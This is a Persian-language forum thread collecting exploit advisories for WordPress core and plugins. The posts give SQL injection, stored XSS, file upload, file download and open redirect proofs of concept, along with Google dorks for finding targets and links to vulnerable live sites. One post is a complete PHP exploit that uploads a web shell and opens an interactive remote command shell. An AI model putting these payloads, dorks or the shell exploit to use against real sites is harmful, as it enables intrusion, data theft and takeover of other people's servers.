0

•••کلکسیون باگ های وردپرس•••

 
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158652
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

•••کلکسیون باگ های وردپرس•••

سلام در این بخش قصد داریم که تمام باگ های مربوط به وردپرس رو قرار بدهم .
امید وارم که خوشتون بیاد.
قوانین تایپیک :
1-لطفا قوانین بخش رو رعایت کنید.
2-اسپم ممنوع.
3-سوال در بخش خودش باشه و سوالات در این تایپیک جایی ندارد.
موفق باشید.

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

یک شنبه 3 خرداد 1394  8:02 AM
تشکرات از این پست
khodaeem1 lovermohamad
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158652
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:•••کلکسیون باگ های وردپرس•••

Wordpress taggator plugin Sql Injection Vulnerabilities
کد:
########################################################
#
# Exploit Title : Wordpress taggator plugin Sql Injection Vulnerabilities
#
# Author        : #BHG Security Center - IrIsT Security Team
#
# Discovered By : Am!r
#
# Home          : http://Black-hg.Org - http://IrIsT.Ir
#
# Software Link : http://wordpress.org/extend/plugins/taggator/
#
# Security Risk : High
#
# Version       : All Version
#
# Tested on     : GNU/Linux Ubuntu - Windows Server - win7
#
# Dork          : "Powered by Wordpress"
#
########################################################
#
#  Expl0iTs :
#
#  [TarGeT]/wp-content/plugins/taggator/taggator.php?tagid=[Sql]
#
#########################################################
#
# Special Thanks To : Net.Edit0r - 3H34N - A.Cr0x - 4M!N - ArYaIeIrAN -
#
# G3n3rall - Mr.XHat - Bl4ck.Viper - Dj.TiniVini - B3Hz4d - Crim3R - d3c0d3r
#
#########################################################
#
# GreetZ : All Active Member in #BHG Security Center & IrIsT.Ir
#
#########################################################

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

یک شنبه 3 خرداد 1394  8:06 AM
تشکرات از این پست
khodaeem1 lovermohamad
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158652
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:•••کلکسیون باگ های وردپرس•••

Thumbs up2 Wordpress taggator plugin Sql Injection Vulnerabilities
کد:
########################################################
#
# Exploit Title : Wordpress taggator plugin Sql Injection Vulnerabilities
#
# Author        : #BHG Security Center - IrIsT Security Team
#
# Discovered By : Am!r
#
# Home          : http://Black-hg.Org - http://IrIsT.Ir
#
# Software Link : http://wordpress.org/extend/plugins/taggator/
#
# Security Risk : High
#
# Version       : All Version
#
# Tested on     : GNU/Linux Ubuntu - Windows Server - win7
#
# Dork          : "Powered by Wordpress"
#
########################################################
#
#  Expl0iTs :
#
#  [TarGeT]/wp-content/plugins/taggator/taggator.php?tagid=[Sql]
#
#########################################################
#
# Special Thanks To : Net.Edit0r - 3H34N - A.Cr0x - 4M!N - ArYaIeIrAN -
#
# G3n3rall - Mr.XHat - Bl4ck.Viper - Dj.TiniVini - B3Hz4d - Crim3R - d3c0d3r
#
#########################################################
#
# GreetZ : All Active Member in #BHG Security Center & IrIsT.Ir
#
 

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

یک شنبه 3 خرداد 1394  8:06 AM
تشکرات از این پست
khodaeem1 lovermohamad
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158652
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:•••کلکسیون باگ های وردپرس•••

WordPress Wysi Plugin Arbitrary File upload Vulnerability
کد:
# Exploit Title: WordPress Wysi Plugin Arbitrary File upload Vulnerability
# Date: June, 14th 2011 [GMT +7]
# Author: Net.Edit0r
# Software Link: http://wordpress.org/extend/plugins/real-wysiwyg/
# Version : 0.0.2
# Tested on: ubuntu 11.04
# CVE : -
 
-----------------------------------------------------------------------------------------
WordPress Wysi Plugin Arbitrary File upload Vulnerability => RFU Vulnerability
-----------------------------------------------------------------------------------------
 
Author : Net.Edit0r
Date : June, 14th 2011 [GMT +7]
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG
---------------------------------------------------------------------------
 
 
Vulnerability:
~~~~~~~~~~~~
in this file you can upload image files without any authentication.
 
for uploading shell you must change extension of file to
.php.gif(shell.php.gif)
 
or any other image extension.successful attack depend to host and
server config.
 
 
 
PoC/Exploit:
~~~~~~~~~~
 
~ [PoC] ~: /wp-content/plugins/Wysi-Wordpress/plugins/filemanager/InsertFile/insert_file.php
 
~ [PoC] ~: Http://[victim]/path-to-wp/wp-content/plugins/Wysi-Wordpress/plugins/filemanager/InsertFile/insert_file.php
 
         [ Upload To : /wp-content/content/shell.php.jpg ]
 
Dork:
~~~~~
Google : inurl:"/filemanager/InsertFile/insert_file.php"
 
 
Demo URL:
~~~~~~~~~
- http://www.kalamu.com/bol/wp-content/plugins/filemanager/InsertFile/insert_file.php
 
- http://www.afofoundation.org/wp-content/plugins/Wysi-Wordpress/plugins/filemanager/InsertFile/insert_file.php
 
 
 Timeline:
~~~~~~~~~
- 13 - 06 - 2011 bug found.
- 13 - 06 - 2011 vendor contacted, but no response.
- 14 - 06 - 2011 Advisories release.
 
 Contact:
~~~~~~~~~
Net.Edit0r@att.net ~ Black.hat.tm@gmail.com
 
---------------------------------------------------------------------------
Greetz To :DarkCoder | 3H34N | Amir-MaGiC | H3x | D3adlY |Cho0bin and
all bhg member
 
Spical Th4nks: B3hz4d | M4Hd1 | GeNeRaLL | Mikili And All My Friendz
 
[!] Persian Gulf 4 Ever
[!] I Love Iran And All Iranian People
-------------------------------- [ EOF ] ------------------------------

 

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

یک شنبه 3 خرداد 1394  8:06 AM
تشکرات از این پست
khodaeem1 lovermohamad
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158652
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:•••کلکسیون باگ های وردپرس•••

Wordpress alert-before-your-post Plugin Cross-Site Scripting Vulnerabilities
کد:
###########################################
#
#
# Islamic Republic Of Iran Security Team
#
#
#
# Www.IrIsT.Ir
#
#
#
########################################################
#
#
# Wordpress alert-before-your-post Plugin Cross-Site Scripting Vulnerabilities
#
#
#
# Download......: http://wordpress.org/extend/plugins/alert-before-your-post/
#
#
#
# Bug Found.....: IrIsT?
#
#
#
# discovery.....: Am!r (IrIsT?)
#
#
#
# contact.......: Amir[at]IrIsT.ir
#
#
#
# Exploit.......:
http://www.site.com/[path]/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=[xss]
#
#
#
# Google Search.: "Powered by Wordpress"
#
#
#
# SP TNX........: B3HZ4D & joker_s & The-0utl4w & m3hdi & vahid4251 & all IrIsT
members #
#
#
# & h4ckcity.org & phcsec.ir & zarbat.org & kalkalhacking.orq.ir
& all SP #
#
#
################################################

 

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

یک شنبه 3 خرداد 1394  8:07 AM
تشکرات از این پست
khodaeem1 lovermohamad
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158652
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:•••کلکسیون باگ های وردپرس•••

WordPress 3.0.4 Stored XSS (via Editor role)
کد:
ANATOLIA SECURITY ADVISORY
--------------------------------------
  
### ADVISORY INFO ###
+ Title: Wordpress 3.0.4 Stored XSS (Role: Editor)
+ Advisory URL: http://www.anatoliasecurity.com/adv/as-adv-2010-005.txt
+ Advisory ID:  2010-005
+ Versions: Wordpress 3.0.4, 3.0.3 (maybe earlies versions)
+ Date: 30/12/2010
+ Vendor: WordPress Blog Tool and Publishing Platform
+ Impact: Execute Malicious Javascript Codes
+ CWE-ID: 79 (Cross-site Scripting)
+ Credit: Anatolia Security
+ Author: Sir - sir[at]anatoliasecurity[dot]com
  
  
### VULNERABLE PRODUCT ###
+ Wordpress: "WordPress is web software you can use to create a
beautiful website or blog. We like to say that WordPress is both free and priceless at the same time."
+ Homepage: http://wordpress.org
  
  
  
### VULNERABILITY DETAILS ###
+ Description: Attackers can execute malicious javascript codes or hijacking SESSION for privilege escalation. The attacker has to be the authority of the editor.
 
Screenshot: http://img3.imageshack.us/img3/1148/wordpressx.png
PoC: '"--></style></script><script>alert('XSS')</script>
 
POST http://localhost/wordpress304/wp-comments-post.php HTTP/1.1
Host: localhost
Connection: keep-alive
Referer: http://localhost/wordpress304/?page_id=2
Content-Length: 189
Cache-Control: max-age=0
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4
Accept-Charset: ISO-8859-9,utf-8;q=0.7,*;q=0.3
Cookie: wp-settings-time-1=1293719651; wordpress_test_
cookie=WP+Cookie+check; wordpress_logged_in_a9710e337f5b83061184233e85654d2c
=editor%7C1293893085%7C1b3f84f58059c0fcf262ef1bb83635c2; wp-settings-time-3=1293720285
 
comment=%27%22--
%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&submit
=Post+Comment&comment_post_ID=2&comment_parent=0&_wp_unfiltered_html_comment=7741b495eb

 

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

یک شنبه 3 خرداد 1394  8:07 AM
تشکرات از این پست
khodaeem1 lovermohamad
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158652
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:•••کلکسیون باگ های وردپرس•••

Wink Wordpress 3.0.3 Stored XSS (IE7,6 NS8.1)
کد:
# Exploit Title: Wordpress 3.0.3 stored XSS IE7,6 NS8.1
# Date: 27 december 2010
# Author: Saif
# Software Link:wordpress.org
# Version: 3.0.3
# Tested on: IE 6
 
a stored XSS vulnerability using CSS styles affecting users surfing the
malicious post using IE6, IE7, NS 8.1
 
POC:
 
"<IMG STYLE="xss:expression(alert('XSS'))">" in the content variable in the
message body of the post request. Users can perform this attack using a web
browser
 
POST /wordpress/wp-admin/post.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15)
Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
*****-Connection: keep-alive
Referer:
http://127.0.0.1/wordpress/wp-admin/post.php?post=145&action=edit&message=1
Cookie:
wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=
xss%7C1293636697%7C17562b2ebe444d17730a2bbee6ceba99;
wp-settings-time-1=1293196695; wp-settings-time-2=1293197912;
wp-settings-1=m3%3Dc%26editor%3Dhtml; wp-settings-2=editor%3Dhtml%26m5%3Do;
wp-settings-time-3=1293462654; wp-settings-3=editor%3Dhtml;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93
=xss%7C1293636697%7C7437e30b3242f455911b2b60daf35e48;
PHPSESSID=a1e7d9fcce3d072b31162c4acbbf1c37;
kaibb4443=80bdb2bb6b0274393cdd1e47a67eabbd;
AEFCookies2525[aefsid]=kmxp4rfme1af9edeqlsvtfatf4rvu9aq
Content-Type: application/x-www-form-urlencoded
Content-Length: 1655
 
 
Regards,
 
Saif
 

 

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

یک شنبه 3 خرداد 1394  8:07 AM
تشکرات از این پست
khodaeem1 lovermohamad
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158652
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:•••کلکسیون باگ های وردپرس•••

Thumbs down Buddypress plugin of Wordpress remote SQL Injection
کد:
# Exploit Title: Buddypress plugin of Wordpress remote SQL Injection
# Date: March 31, 2012
# Author: Ivan Terkin
# Exploitation: Remote Exploit
# Bug: Remote SQL Injection
# Software Link: buddypress.org
# Version: till 1.5.5
# Tested on: Buddypress 1.5.4
 
 
POST /wp-load.php HTTP/1.1
User-Agent: Mozilla
Host: example.com
Accept: */*
Referer: http://example.com/activity/?s=b
Connection: Keep-Alive
Content-Length: 153
Content-Type: application/x-www-form-urlencoded
 
action=activity_widget_******&page=1%26exclude%3d1)and(1=0)UNION
(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+
 
Reported to developers and fixed in version 1.5.5

 

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

یک شنبه 3 خرداد 1394  8:07 AM
تشکرات از این پست
khodaeem1 lovermohamad
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158652
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:•••کلکسیون باگ های وردپرس•••

کد:
<?php
 
/*
    --------------------------------------------------------------------------------
    Wordpress Kish Guest Posting Plugin 1.0 (uploadify.php) Unrestricted File Upload
    --------------------------------------------------------------------------------
     
    author............: Egidio Romano aka EgiX
    mail..............: n0b0d13s[at]gmail[dot]com
    software link.....: http://kishpress.com/guest-posting-plugin/
      
    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+
     
    [-] vulnerable code in /uploadify/scripts/uploadify.php
     
    26.    if (!empty($_FILES)) {
    27.        $tempFile = $_FILES['Filedata']['tmp_name'];
    28.        $targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';
    29.        $targetFile =  str_replace('//','/',$targetPath) . $_FILES['Filedata']['name'];
    30.        // $fileTypes  = str_replace('*.','',$_REQUEST['fileext']);
    31.        // $fileTypes  = str_replace(';','|',$fileTypes);
    32.        // $typesArray = split('\|',$fileTypes);
    33.        // $fileParts  = pathinfo($_FILES['Filedata']['name']);
    34.       
    35.        // if (in_array($fileParts['extension'],$typesArray)) {
    36.            // Uncomment the following line if you want to make the directory if it doesn't exist
    37.            // mkdir(str_replace('//','/',$targetPath), 0755, true);
    38.           
    39.            move_uploaded_file($tempFile,$targetFile);
    40.            echo str_replace($_SERVER['DOCUMENT_ROOT'],'',$targetFile);
    41.        // } else {
    42.        //     echo 'Invalid file type.';
    43.        // }
    44.    }
     
     
    [-] Disclosure timeline:
     
    [19/12/2011] - Vulnerability discovered
    [19/12/2011] - Vendor notified through http://kish.in/contact-me/
    [07/01/2012] - No response from vendor, notified again via email
    [16/01/2012] - After four weeks still no response
    [23/01/2012] - Public disclosure
     
*/
 
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
 
function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80)))
        die("\n[-] No response from {$host}:80\n");
  
    fputs($sock, $packet);
    return stream_get_contents($sock);
}
 
print "\n+----------------------------------------------------------------------------------+";
print "\n| Wordpress Kish Guest Posting Plugin 1.0 Unrestricted File Upload Exploit by EgiX |";
print "\n+----------------------------------------------------------------------------------+\n";
  
if ($argc < 3)
{
    print "\nUsage......: php $argv[0] <host> <path>\n";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /wordpress/\n";
    die();
}
 
$host = $argv[1];
$path = $argv[2];
 
$payload  = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"sh.php\"\r\n\r\n";
$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";
$payload .= "--o0oOo0o--\r\n";
 
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
     
if (!preg_match('/sh.php/', http_send($host, $packet))) die("\n[-] Upload failed!\n");
 
$packet  = "GET {$path}sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
     
while(1)
{
    print "\nkish-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    $response = http_send($host, sprintf($packet, base64_encode($cmd)));
    preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
 
?>

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

یک شنبه 3 خرداد 1394  8:13 AM
تشکرات از این پست
lovermohamad
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158652
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:•••کلکسیون باگ های وردپرس•••

کد:
#Exploit Title: AllWebMenus WordPress Menu Plugin Arbitrary file upload
#Version:  < 1.1.9
#Date: 2012-01-19
#Author: 6Scan (http://6scan.com) security team
#Software Link: http://wordpress.org/extend/plugins/allwebmenus-wordpress-menu-plugin/
#Official fix: This advisory is released after the vendor was contacted and fixed the issue promptly.
#Description:  Unauthorized users could upload arbitrary files to the vulnerable server, potentially executing commands
 
AllWebMenus WordPress Menu Plugin
<1.1.8  Remote File upload
 
On versions < 1.1.8 , lack of checks in script actions.php allowed malicious user to upload any file to the vulnerable server.
Create a file (For example, Wordpress_security.php , with this content <?php echo '6Scan to the rescue';  ?> )
Compress it with zip to awm.zip
 
Use this form to upload the php file to the server
 
<input type="file" name="awm1" size=100>
<input type="hidden" name="AWM_menu_id" value="2134234">
<input type="hidden" name="theaction" value="zip_update">
<input type=submit>
</form>
 
 
 

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

یک شنبه 3 خرداد 1394  8:13 AM
تشکرات از این پست
lovermohamad
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158652
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:•••کلکسیون باگ های وردپرس•••

کد:
# Exploit Title: Wordpress uCan Post plugin <= 1.0.09 Stored XSS
# Dork: inurl:/wp-content/plugins/ucan-post/
# Date: 2012/01/18
# Author: Gianluca Brindisi (gATbrindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/ucan-post.1.0.09.zip
# Version: 1.0.09
 
1)  You need permissions to publish a post from the public interface:
 
    The submission form is not well sanitized and will result in stored xss
    in admin pages:
 
    * Name field is not sanitized and it's injectable with a payload
      which will be stored in the pending submission page in admin panel
      POC: myname'"><script>window.alert(document.cookie)</script>
 
    * Email field is not sanitized but can it will check for a valid email address
      so the maximum result will be a reflected xss
      POC: my@mail.com'"><script>window.alert(document.cookie)</script>
 
    * Post Title is not sanitized and it's injectable with a payload
      which will be stored in the pending submissions page in admin panel
      POC: title'"><script>window.alert(document.cookie)</script>

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

یک شنبه 3 خرداد 1394  8:13 AM
تشکرات از این پست
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158652
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:•••کلکسیون باگ های وردپرس•••

کد:
######################################################
# Exploit Title: WordPress wp-autoyoutube plugin Blind SQL Injection
Vulnerability
# Date: 2012-11-01
# Author: longrifle0x
# software: Wordpress
# Download:http://wordpress.org/extend/plugins/wp-autoyoutube/
# Tools: SQLMAP
######################################################
 
*DESCRIPTION
Discovered a vulnerability in  wp-autoyoutube, Wordpress Plugin,
vulnerability is Blind SQL injection.
 
File:wp-content/plugins/wp-autoyoutube/modules/index.php
Exploit: id=-1; or 1=if
 
*Exploitation*http://localhost:80/wp-content/plugins/wp-autoyoutube/modules/index.php[GET][id=-1][CURRENT_USER()
http://localhost:80/wp-content/plugins/wp-autoyoutube/modules/index.php[GET][id=-1][SELECT(CASE
WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT
0,1)='Y') THEN 1 ELSE 0 END)
http://localhost:80/wp-content/plugins/wp-autoyoutube/modules/index.php[GET][id=-1][MID((VERSION()),1,6)

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

یک شنبه 3 خرداد 1394  8:14 AM
تشکرات از این پست
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158652
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:•••کلکسیون باگ های وردپرس•••

کد:
#Exploit Title: Count-per-day Wordpress plugin Arbitrary file download and XSS
#Version: < 3.1.1
#Date: 2011-01-12
#Author 6Scan (http://6scan.com) security team
#Software Link: http://wordpress.org/extend/plugins/count-per-day/
#Official fix: This advisory is released after the vendor has responded and fixed the issue.
 
PoC for File download
192.168.0.1/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd
 
PoC for XSS
دوستان هرکسی باگی چیزی از ورد پرس داره فقط توی این تایپیک قرار دهید تا تایپیکی جامع داشته باشیم.
موفق باشید.

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

یک شنبه 3 خرداد 1394  8:14 AM
تشکرات از این پست
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158652
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:•••کلکسیون باگ های وردپرس•••

کد:
# Exploit Title: Wordpress Age Verification plugin <= 0.4 Open Redirect
# Date: 2012/01/10
# Dork: inurl:wp-content/plugins/age-verification/age-verification.php
# Author: Gianluca Brindisi (gATbrindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/age-verification.zip
# Version: 0.4
 
     
    The rendered page will provide a link to http://www.evil.com
 
2)  Via POST: http://server/wp-content/plugins/age-verification/age-verification.php
    redirect_to:    http://www.evil.com
    age_day:        1
    age_month:      1
    age_year:       1970
 
    Direct redirect to http://www.evil.com

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

یک شنبه 3 خرداد 1394  8:14 AM
تشکرات از این پست
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158652
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:•••کلکسیون باگ های وردپرس•••

کد:
# Exploit Title: Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities
# Date: 01/06/2012
# Author: Gianluca Brindisi (gATbrindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/pay-with-tweet.1.1.zip
# Version: 1.1
 
1)  Blind SQL Injection in shortcode:
    Short code parameter 'id' is prone to blind sqli,
    you need to be able to write a post/page to exploit this:
 
    [paywithtweet id="1' AND 1=2"]
    [paywithtweet id="1' AND 1=1"]
 
2)  Multiple XSS in pay.php
    http://target.com/wp-content/plugins/pay-with-tweet.php/pay.php   
     
    After connecting to twitter:
        ?link=&22></input>[XSS]
    After submitting the tweet:
        ?title=[XSS]&dl=[REDIRECT-TO-URL]%27)">[XSS]
 
    The final download link will be replaced with [REDIRECT-TO-URL]
 
 

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

یک شنبه 3 خرداد 1394  8:14 AM
تشکرات از این پست
دسترسی سریع به انجمن ها